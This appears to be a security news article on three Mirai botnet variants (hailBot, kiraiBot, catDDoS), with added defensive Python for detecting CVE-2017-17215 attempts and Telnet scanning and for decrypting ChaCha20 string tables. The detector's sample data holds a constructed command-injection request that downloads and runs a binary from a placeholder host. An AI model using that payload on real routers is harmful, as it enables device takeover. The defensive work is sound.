
Researchers Uncover New Variants of Mirai Botnet in the Wild

Several new variants of the Mirai botnet have been observed in the wild since September. Three of them, hailBot, kiraiBot, and catDDoS, have drawn the attention of NSFOCUS researchers, who published technical details on each.

hailBot

hailBot takes its name from the string 'hail china mainland' found in its samples and was first discovered toward the end of last year.
  • It supports four DDoS attack methods based on the TCP and UDP protocols.
  • It spreads via brute-force attacks or by exploiting an old vulnerability (CVE-2017-17215) in the Huawei HG532 router.
  • In some observed cases, it was also distributed through bait documents named 'INVOICE.xlsx', 'Product_requetslist.xlsx', or 'CIF WMS REF NO 451RFQ ARN-DT-2021-06-29.xlsx'.
  • Opening these documents downloaded the bot along with other malware, including Lokibot and Formbook.
  • It is designed to target financial and trade institutions, as well as IoT platforms.

While the botnet has issued few attack commands recently, the researchers note that the number of C2 servers associated with the variant is already large and still growing.
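As an added illustration (not code from NSFOCUS or from the hailBot sample), the following Python sketches a detector for CVE-2017-17215 exploitation attempts of the kind hailBot relies on. It uses the publicly documented shape of that exploit: a SOAP Upgrade request to /ctrlt/DeviceUpgrade_1 on the HG532's UPnP service (TCP/37215) whose NewStatusURL or NewDownloadURL element carries shell metacharacters instead of a plain URL. The sample requests are constructed for this example; addresses, payload host and file names are placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample requests, not captured traffic. The first mimics the
# well-known shape of a CVE-2017-17215 exploit attempt: a SOAP "Upgrade"
# call whose NewStatusURL element carries a shell command substitution.
# Payload host and path are placeholders.
SAMPLE_REQUESTS = [
    "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
    "Host: 192.0.2.10:37215\r\n"
    "Content-Type: text/xml\r\n"
    'SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#Upgrade"\r\n'
    "\r\n"
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
    "<NewStatusURL>$(/bin/busybox wget http://198.51.100.7/x.mips -O /tmp/.x; "
    "/bin/busybox chmod 777 /tmp/.x; /tmp/.x)</NewStatusURL>"
    "<NewDownloadURL>HUAWEIUPNP</NewDownloadURL>"
    "</u:Upgrade></s:Body></s:Envelope>",
    # Benign-looking upgrade call: plain URLs, no shell metacharacters.
    "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
    "Host: 192.0.2.10:37215\r\n"
    "\r\n"
    "<s:Envelope><s:Body><u:Upgrade>"
    "<NewStatusURL>http://192.0.2.20/status</NewStatusURL>"
    "<NewDownloadURL>http://192.0.2.20/fw.bin</NewDownloadURL>"
    "</u:Upgrade></s:Body></s:Envelope>",
    # Unrelated request to the same device.
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
]

UPGRADE_PATH = "/ctrlt/DeviceUpgrade_1"
INJECTABLE_ELEMENTS = ("NewStatusURL", "NewDownloadURL")
# Shell metacharacters that have no business inside a URL handed to the
# firmware-upgrade service: command substitution, command chaining, pipes.
SHELL_METACHARS = re.compile(r"\$\(|`|;|\||&&")


@dataclass
class Finding:
    path: str
    element: str
    payload: str


def parse_request(raw: str) -> Tuple[str, str, str]:
    """Split a raw HTTP/1.x request into (method, path, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    parts = request_line.split(" ")
    method = parts[0] if parts else ""
    path = parts[1] if len(parts) > 1 else ""
    return method, path, body


def inspect_request(raw: str) -> Optional[Finding]:
    """Return a Finding if the request looks like a CVE-2017-17215 attempt."""
    method, path, body = parse_request(raw)
    if method != "POST" or path.split("?", 1)[0] != UPGRADE_PATH:
        return None
    for element in INJECTABLE_ELEMENTS:
        m = re.search(rf"<{element}>(.*?)</{element}>", body, re.S)
        if m and SHELL_METACHARS.search(m.group(1)):
            return Finding(path, element, m.group(1).strip())
    return None


def scan_requests(requests: List[str]) -> List[Finding]:
    """Run inspect_request over a batch and keep only the hits."""
    return [f for f in map(inspect_request, requests) if f is not None]


if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f"{f.path}: command injection via <{f.element}>: {f.payload}")
```

In practice this logic belongs in an IDS rule or a proxy log pipeline restricted to traffic reaching port 37215; the point here is that the signal is the combination of the Upgrade endpoint and shell syntax inside the URL elements, not either one alone. A legitimate upgrade request to the same endpoint (the second sample) must not fire.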

kiraiBot 

  • kiraiBot takes its name from the string 'kirai' in its samples and supports six DDoS attack modes.
  • It achieves persistence by installing a self-starting script under "/etc/init.d/init.d/".
  • Its only known propagation method so far is weak-password (Telnet) scanning on port 23.

The 'kirai' string also appears in the bot's scanning traffic. As in Mirai, successful logins are reported to a separate report server rather than to the C2 itself; while the C&C servers remain fixed, the site hosting the kiraiBot propagation scripts changes.
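Since kiraiBot's only known spreading mechanism is Telnet weak-password scanning, the most useful network signal is horizontal scanning of port 23 (and 2323, which the original Mirai scanner also probed). The following Python is an added example, not NSFOCUS's or the bot's code: it runs a sliding-window count of distinct Telnet destinations per source over a constructed flow log and flags sources that cross a threshold. The window, the threshold, and the flow records are assumptions made for this example and should be tuned to the environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

Flow = Tuple[datetime, str, str, int]  # (timestamp, src_ip, dst_ip, dst_port)

TELNET_PORTS = {23, 2323}    # Mirai-style scanners hit 23 and, less often, 2323
WINDOW = timedelta(seconds=60)
THRESHOLD = 20               # distinct Telnet targets within WINDOW (assumed)


def _constructed_flows() -> List[Flow]:
    """Build a small synthetic flow log (not real data) with three actors."""
    t0 = datetime(2023, 10, 1, 12, 0, 0)
    flows: List[Flow] = []
    # 1) A scanner: 40 distinct destinations on 23/2323 within 30 seconds.
    for i in range(40):
        port = 2323 if i % 10 == 0 else 23
        flows.append((t0 + timedelta(milliseconds=750 * i),
                      "198.51.100.9", f"203.0.113.{i + 1}", port))
    # 2) An administrator connecting to three devices over Telnet.
    for i, dst in enumerate(("192.0.2.11", "192.0.2.12", "192.0.2.13")):
        flows.append((t0 + timedelta(seconds=5 * i), "192.0.2.5", dst, 23))
    # 3) A busy HTTPS client: many destinations, but not on a Telnet port.
    for i in range(60):
        flows.append((t0 + timedelta(seconds=i), "192.0.2.6",
                      f"198.18.0.{i + 1}", 443))
    return flows


SAMPLE_FLOWS = _constructed_flows()


def detect_telnet_scanners(flows: List[Flow], window: timedelta = WINDOW,
                           threshold: int = THRESHOLD) -> Dict[str, int]:
    """Return {src_ip: peak_distinct_targets} for every source that reached
    `threshold` distinct Telnet destinations inside any sliding `window`."""
    per_src: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, src, dst, port in sorted(flows, key=lambda f: f[0]):
        if port in TELNET_PORTS:
            per_src[src].append((ts, dst))

    flagged: Dict[str, int] = {}
    for src, events in per_src.items():
        in_window: Dict[str, int] = defaultdict(int)  # dst -> hits in window
        left, peak = 0, 0
        for ts, dst in events:
            in_window[dst] += 1
            # Slide the left edge forward until every event fits the window.
            while ts - events[left][0] > window:
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            flagged[src] = peak
    return flagged


if __name__ == "__main__":
    for src, peak in detect_telnet_scanners(SAMPLE_FLOWS).items():
        print(f"{src}: {peak} distinct Telnet targets within {WINDOW}")
```

Counting distinct destinations rather than raw connection attempts is what separates a scanner from an administrator who retries one device many times. Where packet data is available the rule can be sharpened further: the original Mirai scanner set the TCP sequence number equal to the destination IP address, and it reported successful logins to a separate report server (port 48101 in the leaked source), which matches the report-server design the researchers describe for kiraiBot.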

catDDoS

This variant adds the ChaCha20 algorithm to the Mirai source code and uses it to encrypt key information stored in the sample.
  • ack_flood accounted for 63% of the observed attacks and grip_flood for 29%.
  • The majority of its targets are located in China (58%), followed by the U.S. (25%); Japan, Singapore, and France were also affected.
  • Like the Fodcha family, it uses OpenNIC domain names for its infrastructure to evade detection.
  • Its attacks mostly take place between 8 a.m. and 9 p.m.
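Because catDDoS protects its key strings with ChaCha20, a plain strings dump of the sample does not reveal them; an analyst needs the key and nonce recovered from the binary plus a correct implementation of the cipher. The following Python is an added example, not catDDoS's or NSFOCUS's code: a self-contained ChaCha20 as specified in RFC 8439 and a small decryptor for a length-prefixed string table. The key, nonce and table layout are placeholders constructed for this example and say nothing about catDDoS's real values.

```python
import struct
from typing import List, Tuple

MASK32 = 0xFFFFFFFF


def _rotl32(v: int, n: int) -> int:
    return ((v << n) & MASK32) | (v >> (32 - n))


def quarter_round(a: int, b: int, c: int, d: int) -> Tuple[int, int, int, int]:
    """The ChaCha quarter round (RFC 8439, section 2.1)."""
    a = (a + b) & MASK32; d = _rotl32(d ^ a, 16)
    c = (c + d) & MASK32; b = _rotl32(b ^ c, 12)
    a = (a + b) & MASK32; d = _rotl32(d ^ a, 8)
    c = (c + d) & MASK32; b = _rotl32(b ^ c, 7)
    return a, b, c, d


# Column rounds followed by diagonal rounds (RFC 8439, section 2.3).
_ROUND_INDICES = (
    (0, 4, 8, 12), (1, 5, 9, 13), (2, 6, 10, 14), (3, 7, 11, 15),
    (0, 5, 10, 15), (1, 6, 11, 12), (2, 7, 8, 13), (3, 4, 9, 14),
)


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """One 64-byte keystream block (256-bit key, 96-bit nonce, 32-bit counter)."""
    if len(key) != 32 or len(nonce) != 12:
        raise ValueError("ChaCha20 needs a 32-byte key and a 12-byte nonce")
    state: List[int] = [
        *struct.unpack("<4I", b"expand 32-byte k"),
        *struct.unpack("<8I", key),
        counter & MASK32,
        *struct.unpack("<3I", nonce),
    ]
    x = state[:]
    for _ in range(10):  # 10 double rounds = 20 rounds
        for a, b, c, d in _ROUND_INDICES:
            x[a], x[b], x[c], x[d] = quarter_round(x[a], x[b], x[c], x[d])
    return struct.pack("<16I", *[(x[i] + state[i]) & MASK32 for i in range(16)])


def chacha20_xor(key: bytes, nonce: bytes, data: bytes, counter: int = 0) -> bytes:
    """Encrypt or decrypt (same operation) by XORing data with the keystream."""
    out = bytearray()
    for block_no, off in enumerate(range(0, len(data), 64)):
        keystream = chacha20_block(key, counter + block_no, nonce)
        out.extend(p ^ k for p, k in zip(data[off:off + 64], keystream))
    return bytes(out)


# Constructed demo blob. The key, nonce and layout are placeholders chosen
# for this example; they are NOT catDDoS's real values.
DEMO_KEY = bytes(range(32))
DEMO_NONCE = b"\x00\x00\x00\x00" + b"demo-nce"   # 12 bytes


def pack_config(entries: List[bytes]) -> bytes:
    """Length-prefixed (u16 little-endian) string table."""
    return b"".join(struct.pack("<H", len(e)) + e for e in entries)


def unpack_config(blob: bytes) -> List[bytes]:
    """Parse the string table; an out-of-range length usually means a wrong key."""
    entries, off = [], 0
    while off + 2 <= len(blob):
        (n,) = struct.unpack_from("<H", blob, off)
        off += 2
        if off + n > len(blob):
            raise ValueError(f"entry length {n} exceeds blob; wrong key or nonce?")
        entries.append(blob[off:off + n])
        off += n
    return entries


DEMO_PLAINTEXT = [b"203.0.113.5:1337", b"ack_flood", b"grip_flood"]
ENCRYPTED_DEMO_CONFIG = chacha20_xor(DEMO_KEY, DEMO_NONCE, pack_config(DEMO_PLAINTEXT))


def decrypt_config(blob: bytes, key: bytes = DEMO_KEY, nonce: bytes = DEMO_NONCE) -> List[bytes]:
    """Recover the string table from an encrypted blob given key and nonce."""
    return unpack_config(chacha20_xor(key, nonce, blob))


if __name__ == "__main__":
    for entry in decrypt_config(ENCRYPTED_DEMO_CONFIG):
        print(entry.decode())
```

ChaCha20 is a stream cipher, so a wrong key or nonce does not fail loudly; it simply yields random-looking bytes, which is why the decryptor checks that every length field stays inside the blob and treats an out-of-range value as a sign that the recovered key material is wrong. The same XOR routine serves for encryption and decryption, and the block counter lets a long blob be decrypted from any 64-byte boundary, which is convenient when only part of a sample's data section has been recovered.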

Conclusion

Reusing code from existing malware has always been a common way to bring new variants into the threat landscape, and the leaked Mirai source code continues to seed new families. Although these variants keep Mirai's core, each adds features meant to improve stealth or widen its reach, so organizations are advised to use the IOCs published for each botnet to understand the operators' TTPs and block the associated infrastructure.
Publisher: Cyware